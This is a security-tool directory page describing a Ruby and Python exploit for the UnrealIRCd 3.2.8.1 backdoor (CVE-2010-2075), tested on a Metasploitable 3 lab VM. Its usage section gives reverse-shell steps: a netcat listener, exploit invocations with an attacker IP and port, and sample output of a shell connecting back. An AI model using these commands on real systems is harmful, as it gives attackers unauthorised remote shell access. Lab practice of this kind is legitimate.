Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
unrealircd3.2.8.1-local-exploit — Ruby and Python exploit for CVE-2010-2075 targeting UnrealIRCd 3.2.8.1, providing remote reverse shell access on Metasploitable 3. | Kitploit
Tools/GitHubGitHub/earthbendergara/unrealircd3.2.8.1-local-exploit
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubearthbendergara/unrealircd3.2.8.1-local-exploit

unrealircd3.2.8.1-local-exploit

Ruby and Python exploit for CVE-2010-2075 targeting UnrealIRCd 3.2.8.1, providing remote reverse shell access on Metasploitable 3.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
139 months agoNot yet reviewed
Share

Tested on Metasploitable 3

USAGE

Ruby

On Attacker's shell

root@kitploit:~
nc -nlvp 1111

On victim's shell

root@kitploit:~
ruby exploit.rb 127.0.0.1

Expected output on attacker's shell

root@kitploit:~
listening on [any] 1111 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 48144
boba_fett

Python

On victim's shell

root@kitploit:~
python3 exploit.py -ri 127.0.0.1 -rp 6697 -cmd <command> -li <attacker_ip> -lp <attacker_port>

On Attacker's shell

root@kitploit:~
nc -nlvp 1111
Download Tool